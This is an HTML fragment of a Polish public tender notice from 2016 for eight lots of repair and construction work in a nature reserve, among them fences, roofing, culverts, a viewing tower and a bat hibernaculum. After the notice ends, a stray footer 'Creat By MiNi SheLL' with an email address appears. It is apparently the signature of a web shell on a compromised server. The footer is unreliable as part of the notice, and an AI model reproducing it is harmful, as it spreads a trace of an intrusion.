<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 30/09/2016, godzina: 11:45,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Osoby do kontaktu z wykonawcami:</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Remont płotów szczelnych 1260 mb - Rezerwat nr 1 i 2.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>) Demontaż starego ogrodzenia, prostowanie, betonowanie 30szt. słupów (dół o wymiarach 40x40x60cm) z kopaniem i plantowaniem ziemi z urobku.
b) Prostowanie, czyszczenie i malowanie istniejących słupów stalowych farbą antykorozyjną w kolorze czarnym.
c) Ogrodzenie pełne deskowe o długości 1350 mb na słupach stalowych.
e) Porządkowanie placu budowy z odpadów i śmieci, wywóz i utylizacja materiałów z rozbiórki.
1. Charakterystyka
a)	płot szczelny deskowy wys. 2m na słupach stalowych  1350mb.
b)	tarcica iglasta (sosna lub świerk) - wym. 38mm, min. szerokość desek 150mm.
c)	rygle (kantówki) sosnowe - wym. 100/120mm. 
d)	listwa dystansowa (sosna lub świerk) - wym. 5/10mm.
e)	słupki pod daszek ogrodzenia (sosna) - wym. 100/120mm.
f)	deski iglaste na daszek (sosna lub świerk) - wym. 25/180mm.   
2. Wymagania
a)	tarcica impregnowana środkiem grzybobójczym, owadobójczym i trwale zabezpieczającym drewno przed czynnikami atmosferycznymi w kolorze herbacianym  malowana dwukrotnie lub nasączana ciśnieniowo (np. Protector W-2, Izohan impregnat W-2 lub równoważny impregnat oleisty o podobnych parametrach technicznych). 
b)	nie dopuszcza się stosowanie preparatów solnych.
c)	beton B15.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 40<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Impregnacja płotów szczelnych 1260 mb - Rezerwat nr 1 i 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>a) Oczyszczenie desek, rygli, daszku, wykonanie drobnych napraw polegających na uzupełnieniu brakujących i wymianie zniszczonych elementów.
b) Odkrzaczanie i obkaszanie chwastów w bezpośrednim sąsiedztwie ogrodzenia.
c) Dwukrotna konserwacja środkiem impregnującym i grzybobójczym oleistym w kolorze herbacianym odpornym na działanie warunków atmosferycznych wykonana metodą oprysku ciśnieniowego.
d) Oczyszczenie elementów metalowych i malowanie dwukrotne farbą antykorozyjną w kolorze czarnym.
1.	Charakterystyka
a)	środek impregnujący i grzybobójczy oleisty w kolorze herbacianym odporny na działanie warunków atmosferycznych (np. Protector W-2, Izohan impregnat W-2 lub równoważny impregnat oleisty o podobnych parametrach technicznych).
b)	farba antykorozyjna czarna, rozcieńczalnik.
2. Wymagania
a)	impregnacja wykonana metodą oprysku ciśnieniowego elementów drewnianych. 
b)nie dopuszcza się stosowanie preparatów solnych.
c)malowanie dwukrotne pędzlem elementów metalowych farbą antykorozyjną w kolorze czarnym.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 40<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>Remont (przebudowa) odłowni - Rezerwat nr 3.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>a)Rozebranie istniejących elementów drewnianych.
b)Prostowanie i betonowanie istniejących słupów.
c)Stopy fundamentowe betonowe z betonu B15 pod konstrukcję ściany ruchomej szydła. 
d)Wykonanie ściany ruchomej szydła z elementów drewnianych na konstrukcji metalowej.
e)Wykonanie ogrodzenia z desek gr. 38 mm na ryglach z krawędziaków gr. 100x120 mm.
f)Wykonanie podestu o szer. 0,6 m na ścianach odłowni na wysokości 1,3 m od górnej krawędzi ogrodzenia, z desek gr. 38 mm
g)Bramy i furtki oraz ściana ruchoma z desek gr. 25mm na konstrukcji z krawędziaków.
h)Bramy, furtki i ogrodzenie kryte daszkiem z desek gr. 25mm i wysokości 240mm na stójkach 100x100mm.
1. Charakterystyka
a)	środek impregnujący i grzybobójczy oleisty w kolorze herbacianym odporny na działanie warunków atmosferycznych (np. Protector W-2, Izohan impregnat W-2 lub równoważny impregnat oleisty o podobnych parametrach technicznych).
b)	elementy metalowe po oczyszczeniu i odtłuszczeniu zagruntować, i pomalować 2 x farbą antykorozyjną.
c)	materiały budowlane oraz elementy prefabrykowane winny odpowiadać atestom technicznym oraz ustaleniom odnośnych norm.
2. Wymagania
a)	impregnacja wykonana metodą oprysku ciśnieniowego elementów drewnianych. 
b)nie dopuszcza się stosowanie preparatów solnych.
c)malowanie pędzlem elementów metalowych farbą antykorozyjną chlorokauczukową w kolorze czarnym.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 40<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>IV
                  
                <b>Nazwa: </b>Wymiana pokrycia dachowego i podłóg drewnianych w trzech wiatach.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lokalizacja: Obwód Ochronny Cupryki, oddziały: 221Ad , 158Ba , 159Db
1.Zakres robót przy wymianie pokrycia dachowego: 
a)demontaż istniejącego pokrycia dachowego, w przypadku zasadności wymiana elementów konstrukcyjnych więźby dachowej, 
b)wykonanie pełnego deskowania z szalówki o grubości ok 2 cm, 
c)pokrycie warstwą papy jednowarstwowej izolacyjnej, 
d)pokrycie warstwą wierzchnią z gontu pełnego, podwójnie/na zakład, 
e)podwójna impregnacja odpowiednim preparatem. 
2.	Wymagania 
a)	preparat nanoszony pędzlem, gwarancja na powłokę minimum 6 lat, ilość warstw minimum 2. 
3.	Zakres prac przy wymianie podłóg drewnianych:
a)	podłoga drewniana deska na legarach - demontaż istniejących podłóg, wykonanie warstwy podsypki z kruszywa typu żwir o grubości po zagęszczeniu 5 cm, ułożenie legarów drewnianych dębowych o wymiarach 5x6 cm w odstępach 0,6  0,7m, ułożenie podłogi z deski podłogowej dębowej o grubości 4 cm i szerokości 12-14 cm, obrzeża z listwy drewnianej dębowej, elementy drewniane podwójna impregnacja odpowiednim preparatem.
b)	podłoga drewniana z kostki dębowej - demontaż istniejących podłóg, wykonanie warstwy podsypki z kruszywa typu żwir o grubości po zagęszczeniu 5 cm, stabilizowanej cementem, ułożenie podłogi z kostek dębowej o wymiarach 10x10x10 cm, obrzeża z listwy drewnianej dębowej, elementy drewniane podwójna impregnacja odpowiednim preparatem.
Dodatkowo: konserwacja pozostałych elementów drewnianych wiaty.
3.1. Wymagania 
preparat nanoszony pędzlem, gwarancja na powłokę minimum 6 lat, ilość warstw minimum 2. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 40<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>V
                  
                <b>Nazwa: </b>Remont istniejących 5 szt. przepustów oraz dostawa żwiru i kruszywa do utrzymania dróg do celów ppoż.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lokalizacja: przepusty: Obwód Ochronny Gruszki, oddziały: 161B, 162A, Obwód Ochronny Masiewo, oddziały 163B, 164A), dostawa kruszywa: drogi dojazdowe do celów ppoż. na terenie Obrębu Ochronnego Rezerwat (w załączeniu mapa ze szczegółowa lokalizacją planowanych prac).
1.Zakres robót przy remoncie istniejących przepustów:
a)demontaż istniejącego fragmentu torowiska,
b)demontaż istniejącego przepustu z kręgów betonowych wraz z wywiezieniem kręgów poza teren BPN i utylizacją na własny koszt, 
c)wykonanie podbudowy z kruszywa naturalnego zagęszczanego mechanicznie o grubości 20 cm,
d)ułożenie nowego przepusty z rury typu PEHD z zachowaniem odpowiednich spadków, 
e)zasypaniem przepustu kruszywem naturalnym o odpowiednich parametrach i zagęszczenie, 
f)wykonanie górnej warstwy żwirowej o grubości 20 cm o odpowiednich parametrach, 
g)	odtworzenie zdemontowanego fragmentu torowiska wraz z wymianą podkładów na nowe (podkłady: podkłady z drewna sosnowego, impregnowane ciśnieniowo o wymiarach 115x15x10), 
h)	stabilizacja brzegów skarpy obustronnie przy pomocy płyt ażurowych, plastikowych o grubości min. 4 cm (lub w inny sposób uzgodniony z zamawiającym np.: z prefabrykowanych elementów  jako uzupełnienie przepustu lub inne), 
i)	porządkowanie terenu,
j)	naprawa odcinków dróg, dostawa żwiru (żwir siany drogowy) i kruszywa (kruszywo lokalne) we skazane miejsca na głównych drogach północnej części OO Rezerwat.
2.	Elementy: 
a)	Przepusty o średnicy 60 cm  24 mb
b)Przepusty o średnicy 80 cm ( podwójny)  14 mb (2x7mb)
c)Płyty ażurowe  64 m2
d)Demontaż i montaż podkładów kolejowych  96 szt.
e)Wyczyszczenie rowów z obu stron  400 mb
3.	Zakres robót przy dostawie żwiru i kruszywa do utrzymania dróg do celów ppoż: 
a)	remont cząstkowy dróg i placów postojowo-składowych o nawierzchni żwirowej wykonywana punktowo lub "dywanowo" w miejscach wskazanych przez Zamawiającego,
b)	naprawianie odcinków drogi poprzez wysypywanie kruszywa bezpośrednio ze środków transportu na wskazane miejsce.
3.1.Elementy:
c)Dostawa żwiru  1080 m3
d)Dostawa kruszywa łamanego  100 m3
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 40<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VI
                  
                <b>Nazwa: </b>Remont  ogrodzeń osad służbowych w Starym Masiewie i Zamoszu.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Płot z siatki ocynkowanej 1,2 m, 
- Słupki z profilu kwadratowego ocynkowane 50X50mm o długości 1800mm, grubość min. 3mm,  odstęp co 3mb, wbetonowane na głębokość 60 cm, zaprawa murarska B20, słupy narożne, bramowe i końcowe, wsparte podporami z takiego samego profilu. 
- Siatka z drutu 2,8mm, otwory 65x65mm, wsparta na  trzech drutach napinających, stalowych  3-4 mm.
2. Płot ze sztachet drewnianych 1,2m, 
- Sztachety 90 mm szerokości i 20 mm grubości, zabezpieczonych impregnatem, koloru brązowego. 
- Słupki stalowe z profilu kwadratowego 50x50mm długości 1800mm, grubość min. 3mm, zabezpieczone farbą antykorozyjnie, koloru czarnego. Słupki co 3mb, wbetonowane na głębokość min. 60cm.
- Pasy stalowe z profilu 40x25mm przykręcane do słupków śrubami, zabezpieczone antykorozyjnie, koloru czarnego.
3. Bramy, furtki,
- Słupki stalowe z profilu 80x80mm i długości 2000mm, zabezpieczone antykorozyjnie, koloru czarnego, wbetonowane na głębokość 80cm, skrzydła z profilu 25x40mm, grubości min. 3mm. Wypełnienie sztachetami z profilu stalowego otwartego, wys. 1,2m, szer. 120mm . 
- furtki z zamkami zamykane na klucz, 
- bramy zamykane na rygiel z możliwością założenia kłódki.
4. Długości ogrodzeń:
a) Zamosze 48, 50, 52, 54:
- ogrodzenie sztachetowe: 232mb , w tym (1 brama z furtką - 5,5mb; 2 bramy - 4,3mb; 5 furtek - 1,2mb),
- ogrodzenie z siatki: 496mb, w tym (4 bramy - 4,3mb; 3 furtki - 1,2mb)
b) St. Masiewo 53, 55, 57:
 - ogrodzenie sztachetowe: 41mb, w tym (1 brama z furtką - 5,5mb)
 - ogrodzenie z siatki: 347mb, w tym (1 brama z furtką - 5,5mb; 2 bramy - 4,3mb)
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 40<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VII
                  
                <b>Nazwa: </b>Rozbiórka i budowa punktu widokowego w kształcie brogu.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lokalizacja: Obwód Ochronny Cupryki, oddział: 221E
1.Dane ogólne: 
zadaszony punkt widokowy na potrzeby zwiedzających jako punkt obserwacyjny przyrody i zwierzyny. Budowla zadaszona dachem kopertowym o lekkim pokryciu z gontu. Wymiary zewnętrzne: długość 4,3m; szerokość  4,3m; wysokość  6,43m od poziomu terenu, powierzchnia zabudowy 18,49m. 
2.Charakterystyka
Konstrukcję wiaty stanowią stopy z pali dębowych 25cm, podłoga z desek na legarach, zadaszenie i elementy punktu o konstrukcji drewnianej. Konstrukcja dachu  krokwiowa czterospadowa, z drewna iglastego nasyconego środkami przeciwogniowymi i zabezpieczającymi przed korozją biologiczną, oparta na słupach 25cm. Pokrycie dachu gont łupany na zakład po łatach 40/60mm w rozstawie co ok. 30cm kontrłatach i 25/70mm mocowanych do krokwi papie asfaltowej podkładowej do pokryć dachowych i od spodu podsufitka z desek struganych i frezowanych gr. 25mm (szalówka drewniana impregnowana 2 x środkiem dekoracyjno  ochronnym). 
3.Zakres robót do wykonania:
a)Rozbiórka elementów drewnianych i metalowych budowli (szalówka, obróbki blacharskie, pokrycie dachowe, elementy konstrukcyjne, podłogi, balustrady).
b)Montaż słupów dębowych 25cm.
c)Montaż elementów konstrukcyjnych (płatwie, kleszcze, krokwie, legary).
d)Montaż balustrad, podłóg, ławek.
e)Pokrycie powierzchni drewnianego dachu papą asfaltową, a następnie gontem łupanym na zakład wraz z obróbkami na kontrłatach, pow. 46,40 m.
f)Montaż podsufitki.
g)Impregnacja elementów drewnianych 2 x środkiem dekorochronnym.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 40<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VIII
                  
                <b>Nazwa: </b>Remont - adaptacja nieczynnej hydroforni na potrzeby zimowiska dla nietoperzy w Parku Pałacowym w Białowieży.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Zakres robót do wykonania:
a)Rozebranie ażurowej ścianki drewnianej nad wejściem do hydroforni, o wymiarach 1,35 m x 5,10 m wraz z demontażem siatki metalowej przymocowanej do w/w ścianki (fot. 1).
b)W powstałym otworze o wymiarach jak wyżej wymurowanie ścianki z cegieł DZ-220 grubości 1/2 cegły wraz z otynkowaniem. W górnej części ścianki murowanej należy pozostawić poziomy otwór wlotowy o wymiarach wys. 0,15 m x długość 0,60 m.
c)Rozebranie ażurowej ścianki drewnianej w tylnej części obiektu, o wymiarach 1,35 m x 5,10 m wraz z demontażem siatki metalowej przymocowanej do w/w ścianki (fot. 2).
d)W powstałym otworze o wymiarach jak wyżej wymurowanie ścianki z cegieł DZ-220 grubości 1/2 cegły wraz z otynkowaniem.
e)Demontaż drewnianych drzwi wejściowych wraz ze ścianką drewnianą o łącznych wymiarach 3,00 m x 2,30 m (fot. 3). 
f)W powstałym otworze o wymiarach jak wyżej wykonanie ścianek murowanych z cegieł DZ-220 grubości 1/2 cegły z miejscowymi kotwieniami po obwodzie i wzmocnionej zbrojeniem z prętów stalowych 8, co 2-ga warstwa, otynkowanie tynkiem wapienno-cementowym kat. III, montaż zewnętrznych drzwi stalowych profilowanych o wymiarach min. 2,0 m x 0,80 m z izolacją termiczną, z zasuwą/ryglem, przystosowanych do zamykania na kłódkę, wraz z kłódką. Współczynnik przenikania ciepła dla drzwi min. Ud=1,00 W/m2K. Montaż listew wykończeniowych.
g)Wykonanie konstrukcji drewnianych z pojedynczych desek niestruganych dębowych lub sosnowych mocowanych wewnątrz obiektu do ściany betonowej zbrojonej na schronienia dla nietoperzy. Deski o grubości minimum 2,0 cm, szerokości minimum 20,0 cm, różnej długości, łączna długość konstrukcji ok. 100m. Deski winne być mocowane równolegle do ściany, w odległości 1-2 cm od ściany, część pod różnymi kątami celem ograniczenia przewiewu od góry/dołu (rys.1). 
h)	Montaż na zaprawę cementową do posadzki i ścian betonowych cegieł dziurawek DZ-220 w ilości 120 sztuk oraz U-220 w ilości 80 sztuk - część cegieł pionowo, część poziomo, na ukrycia dla nietoperzy.
2. Wymagania Zamawiającego: 
a)Wykonawca wykona prace ze swoich materiałów, przy użyciu własnych narzędzi i transportu.
b)Konstrukcje drewniane nie mogą zawierać żadnych środków zabezpieczających drewno! 
UWAGA: Obiekt (hydrofornia) nie posiada zasilania elektrycznego.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com